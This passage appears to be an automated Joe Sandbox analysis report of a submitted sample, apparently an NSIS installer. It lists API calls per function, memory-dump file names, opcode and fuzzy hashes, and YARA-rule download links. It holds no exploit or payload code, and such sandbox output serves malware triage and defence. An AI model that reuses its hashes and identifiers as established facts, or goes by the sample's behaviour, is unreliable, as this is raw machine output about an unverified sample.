Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Function 00403859 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(FFFFFFFF,00403AD1,?), ref: 00403864

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
Instruction ID: b9bdbc8744521ee651ba7bc90111acac5a2c88e2b86e9c74d328a3688b9dc09a
Opcode Fuzzy Hash: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
Instruction Fuzzy Hash: 7BC0223810020092E1242F34AE0EB063A04F740330F500B3EF0F2F02F0D73C8640006D

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

, xrefs: 00404F39
M, xrefs: 00404B43
@, xrefs: 00404B90
N, xrefs: 00404C06

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(: Completed,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,: Completed), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

: Completed, xrefs: 00404674, 00404679, 00404684
A, xrefs: 00404636
@rD, xrefs: 00404610
82D, xrefs: 004046DB

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$: Completed$@rD$A
API String ID: 3347642858-2952707010
Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

GetTTFNameString, xrefs: 00406F07
name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
Delete: DeleteFile("%s"), xrefs: 00406DBC
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
Delete: DeleteFile failed("%s"), xrefs: 00406DFD

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 00406805 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(: Completed,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(: Completed,00002004), ref: 0040696B
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(: Completed,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

: Completed, xrefs: 0040682C, 00406918, 0040691E, 00406942, 00406957, 0040696A, 00406986, 004069B1, 004069E4, 00406A03, 00406A18, 00406A19, 00406A27, 00406A40, 00406A46, 00406A53, 00406A8C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-2549942501
Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 0080588A Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.168239316462.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Offset: 007F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7f2000_JHPvqMzKbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e6d2ae667a48c4bda4a81205c8383837720dccfb25caea46cb10ffc0f2308b
Instruction ID: afd80dfa342c409c62a6dee2f39c04395f0815d1c96dae54e014cc9993800fb3
Opcode Fuzzy Hash: a2e6d2ae667a48c4bda4a81205c8383837720dccfb25caea46cb10ffc0f2308b
Instruction Fuzzy Hash: D861CFA290E7C19FDB1347745C792917FB0AE27204B5E85CFC8C28E4A3E25D584ADB63

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

EnumProcesses, xrefs: 00406482
